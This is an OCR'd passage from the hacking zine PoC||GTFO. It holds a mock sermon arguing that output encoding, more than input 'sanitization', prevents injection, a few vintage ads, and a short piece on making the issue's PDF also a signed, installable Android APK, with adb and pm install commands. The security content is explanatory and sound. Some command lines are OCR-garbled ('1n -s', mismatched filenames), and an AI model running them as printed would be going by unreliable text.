by Andreas Bogk 


Knight in the Grand Recursive Order of the Knights of the Lambda Calculus 


Priest in the House of the Apostles of Eris 


What good is a pulpit that can't be occasionally shared with a neighborly itinerant preacher? In this fine 
sermon, Sir Andreas warns us of the heresy that “input sanitation” will somehow protect you from injection 
attacks, no matter what comes next for the inputs you've “sanitized”—and vouchsafes the true prophecy of 
parsing and unparsing working together, keeping your inputs and outputs valid, both coming and going. 


—PML 


Brothers, Sisters, and Variations Thereupon! 


Let me introduce you to a good neighbor. Her 
name is O'Hara and she was born on January 1st 
in the year 1970 in Dublin. She's made quite an 
impressive career, and now lives in a nice house in 
Scunthorpe, UK, working remotely for AT&T. 

I ask you, neighbors: would you deny our neigh- 
bor O'Hara in the name of SQL injection preven- 
tion? Or would you deny her date of birth, just 
because you happen to represent it as zero in your 
verification routine? Would you deny her place of 
work, as abominable as it might be? Or would you 
even deny her place of living, just because it contains 
a sequence of letters some might find offensive? 

You say no, and of course you'd say no! As her 
name and date of birth and employer and place of 
residence, they are all valid inputs. And thou shalt 
not reject any valid input; that truly would not be 
neighborly! 

But wasn't input filtering a.k.a. “sanitization” 
the right thing to do? Don't characters like ? and & 
wreak unholy havoc upon your backend SQL inter- 
preter or your XHTML generator? 

So where did we go wrong by the neighbor 
O'Hara? 


There is à false prophesy making the rounds 
that you can protect against undesirable injection 
into your system by "input sanitization,” no matter 
where your “sanitized” inputs go from there, and no 
matter how they then get interpreted or rendered. 
This “sanitization” is a heathen fetish, neighbors, 
and the whole thing is dangerous foolery that we 
need to drive out of the temple of proper input- 
handling. 

Indeed, is the apostrophe character so inherently 
dirty and evil, that we need to "sanitize" them out? 
Why, then, are we using this evil character at all? 
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Is the number 0 evil and unclean, no matter what, 
despite historians of mathematics raving about its 
invention? Are certain sounds unspeakable, regard- 
less of where and when one may speak them? 


No, no, and no—for all bytes are created equal, 
and their interpretation depends solely on the con- 
text they are interpreted in. As any miracle cure, 
this snake oil of "sanitization" claims a grain of 
truth, but entirely misses its point. No byte is in- 
herently “dirty” so as to be “sanitized” as such—but 
context and interpretation happeneth to them all, 
and unless you know what these context and the in- 
terpretations are, your “sanitization” is useless, nay, 
harmful and unneighborly to O'Hara. 


'The point is, neighbors, that at the input time 
you cannot possibly know the context of the output. 
Your input sanitation scheme might work to protect 
your backend for now—and then a developer comes 
and adds an LDAP backend, and another comes and 
inserts data into a JavaScript literal in your web 
page template. Then another comes and adds an 
additional output encoding layer for your input— 
and what looked safe to you at the outset crumbles 
to dust. 








The ancient prophets of LISP knew that, for they 
fully specified both what their machine read, and 
what it printed, in the holy REPL, the Read-Eval- 
Print Loop. The P is just as important as the R 
or even the E—for without it everything falls to the 
ground in the messy heaps that bring about XSS, 
memory corruption, and packet-in-packet. Pretty- 
printing may sound quaint, a matter unnecessary 
for “real programmers,” but it is in fact deep and 
subtle—it is unparsing, which produces the represen- 
tation of parsed data suitable for the next context 
it is consumed in. They knew to specify it precisely, 
and so should you. 


So what does the true prophecy look like? Verily 
sanitize your input—to the validity expectations you 
have of it. Yet be clear what this really means, and 
treat the output with as much care as you treat the 
input—because the output is a language too, and 
must be produced according to its own grammar, 
just as validating to the input grammar is the only 
hope of keeping your handler from pwnage. 

Sanity in input is important in structured data. 
When you expect XML, you shall verify it is XML. 
When you expect XML with a Schema, also verify 
the schema. Expecting JSON? Make sure you got 
handed valid JSON. Use a parser with the appro- 
priate power, as LangSec commands. Yet, if your 
program were to produce even a single byte of out- 
put, ask—what is the context of that output? What 
is the expected grammar? For verily you cannot 
know it from just the input specification. 

Any string of characters is likely to be a valid 
name. There is nothing you should really do for 
"sanitation," except making sure the character en- 
coding is valid. If your neighbor is called O'Hara, 
or Torsby, or Áke, make sure you can handle this 
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input—but also make sure you have the output cov- 
ered! 


This is the true meaning of the words of prophets: 
input validation, however useful, cannot not prevent 
injection attacks, the same way washing your hands 
will not prevent breaking your leg. Your output is 
a language too, and unless you generate it in full 
understanding of what it is—that is, unparse your 
data to the proper specification of whatever code 
consumes it—that code is pwned. 

Parsing and unparsing are like unto the two 
wings of the dove. Neglect one, and you will not get 
you an olive branch of safety—nay, it will never even 
leave your ark, but will flap uselessly about. Do not 
hobble it, neighbors, but let it fly true—doing right 
by neighbors like O’Hara both coming and going! 

EOL, EOF, and EOT! 
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Packed in Parchment-lined 
One Pound and Half-pound Canisters 





1-1b. Canisters, 60 cents 
1-2 Ib. Canisters, 35 cents 


WE INVITE COMPARISON WITH OTHER TEAS 
OF THE SAME OR HIGHER PRICE 


S. S. PIERCE CO. 
Eos diles Ses? BOSTON Cama” | BROOKLINE 
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M. R. BRIGGS, A HAM OPERATOR FOR 35 YEARS, IS MANAGER OF MISSILE 
GROUND CONTROL ENGINEERING, WESTINGHOUSE ELECTRONICS DIVISION 


ALL ELECTRONIC ENGINEERS 
WITH A DESIRE TO 


CREATE! 


The building of a ham station is an outlet for some of our 
creativeness. In the 35 years I've been a ham operator, I've 
found a lot of satisfaction in my hobby: but nothing gives me more 
creative pleasure than my job. 

At the Westinghouse Electronics Division, creativeness is 
encouraged. Important, too, is the fact that the work is so vital! 
We're working on advanced development projects that are both 
interesting and challenging! For the expansion of these projects 
we are looking for electronic engineers experienced in radar and 
Missile Guidance Systems. 

Of course, Westinghouse offers the finest income and benefit 
advantages, as well as a good location. You'll find ideal suburban 
living accommodations and many big-city attractions. 

If you'd like more information on the high-level openings to be 
filled in the near future, drop us a line today! 


R. M. Swisher, Jr. 

Employment Supervisor, Dept. 34 
Westinghouse Electric Corp. LH. ME 
2519 Wilkens Avenue 
Baltimore 3, Maryland 


you can BE SURE...iF irs 


Westinghouse 
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11 Are All Androids Polyglots or Only C-3PO? 


$ pm install /sdcard/pocorgtfo12.pdf 


That's all it takes to install this polyglot as an 
Android application. So what's the Jedi mind trick? 


Basically, we merged the content of an Android 
application with the ZIP feelies. (Please excuse the 
cruft you'll find in the feelies!) 


Now I won't teach you anything if I tell you that 
an APK is just a ZIP. It is, of course, a ZIP, but not 
just, if we also want it to be an Android app; we 
need the application itself, for one thing, and then 
some. 


The Android OS requires all applications to be 
signed in order to be installed, so our polyglot needs 
to be signed by our Pastor, which is actually not 
a bad practice. Beyond this, Android doesn't re- 
ally care about what else the ZIP could be (e.g., it 
can be a PDF, as is the glorious PoC||GTFO tra- 
dition), but the trick is that all of the archive con- 
tents must be signed. In particular, this must in- 
clude all the original feelies, as you can observe in 
META-INF/MANIFEST.MF. 


The resulting polyglot can be installed directly 
if dropped on /sdcard/, as well as locally, by using 
the Android Package Manager as shown above. 





by Philippe Teuwen 
































But I expect most readers—well, only those crazy 
enough to give execute permission to the Pastor on 
their terminals—to install it via the Android Debug 
Bridge tool adb. This method expects the applica- 
tion package filename to end in .apk, so let's humor 
it: 


$ 1n -s pocorgtfoi2.pdf pocorgtfoi2.apk 
$ adb install pocorgtfo12.apk 


But what does this application do? Not much, 
really. It copies itself (the installed APK) to 
/sdcard/pocorgtfoi2.pdf and opens the copy 
with your preferred PDF reader. 

Note: Imperial security is improving and on the 
latest versions of the OS, even if this 'droid polyglot 
gets installed, it may fail in dex20at. You may need 
to develop your own Jedi tricks to tell them these 
are not the droids they are looking for—and if you 
do, please send them to us!°° 

And you, my friend, are you a polyglot? Let's 
celebrate this fine Québécoise release with a classic 
charade! 


55 This has been finally solved in time for this electronic release. Use the Force to unravel its secrets... You may even propagate 
it neighbourly by Near Force Communication, in which case Padawans have first to accept apks from unknown sources. 








Charade des temps modernes 


Mon premier est le nombre de Messier de la Galaxie d'Androméde. 

Mon second est la somme de quatre nombres premiers consécutifs commençant par 41. 
Mon troisieme est le nombre atomique de l'Unennquadium. 

Mon quatriéme est le nombre modele qui succéda au Sinclair ZX80. 


Mon tout leve tous les obstacles sur le chemin de la Science. 
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12 Tithe us your Alms of Oday! 


Dear neighbors, 

It’s easy to feel down in these dark times. The 
prices are up, the stocks are down, and even in this 
twenty first century, innocent kids are imprisoned 
or driven to the brink of madness in the name of 
justice. 

But don’t despair! There are clever things to be 
done and good conversations to be had, while the 
barbarians aren’t yet at our door. 

I have a good friend named Jacob. He’s a bar- 
tender, but to his regulars, he is a professional con- 
versation pimp. When you sit down at his bar by 
yourself, you'll barely have time to take that first 
sip of your whiskey before he introduces you to Al- 
ice and Bob, as you all three do something with that 
fancy cryptography stuff. 

Or he might introduce you to Mallory, as you 
both enjoy a malicious prank or two. Or to Sergey, 
as you both enjoy rare cat pictures. 

And when it’s too early or too late for him to in- 
troduce you to a new friend, he’ll strike up a conver- 
sation himself like those bartenders do on television 
shows, but so rarely in real life. 

So be like Jacob, and make the world a better 
place through good conversation. Verily I tell you, 
Jacob’s bar, and our pews, and the timbers of what- 
ever roof you strike a friendly conversation under are 
all part of the same great ladder of neighborliness! 
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from the desk of Pastor Manul Laphroaig, 
International Church of the Weird Machines 


































































































Do this: write an email telling our editors how 
to reproduce ONE clever, technical trick from your 
research. If you are uncertain of your English, we’ll 
happily translate from French, Russian, Southern 
Appalachian, and German. If you don’t speak those 
languages, we'll draft a translator from those poor 
sods who owe us favors. 

Like an email, keep it short. Like an email, you 
should assume that we already know more than a 
bit about hacking, and that we'll be insulted or— 
WORSE!—that we'll be bored if you include a long 
tutorial where a quick reminder would do. 

Just use 7-bit ASCII if your language doesn’t 
require funny letters, as whenever we receive some- 
thing typeset in OpenOffice, we briefly mistake it 
for a ransom note. Don’t try to make it thorough 
or broad. Don’t use bullet-points, as this isn’t a 
damned Powerpoint deck. Keep your code samples 
short and sweet; we can leave the long-form code as 
an attachment. Do not send us IATEX; it’s our job 
to do the typesetting! 

Don’t tell me that it’s possible; rather, teach me 
how to do it myself with the absolute minimum of 
formality and bullshit. 

Like an email, we expect informal (or faux- 
biblical) language and hand-sketched diagrams. 
Write it in a single sitting, and leave any editing 
for your poor preacherman to do over a bottle of 
fine scotch. Send this to pastor@phrack.org and 
hope that the neighborly Phrack folks—praise be to 
them!—aren’t man-in-the-middling our submission 
process. 


Yours in PoC and Pwnage, 
Pastor Manul Laphroaig, D.D. 


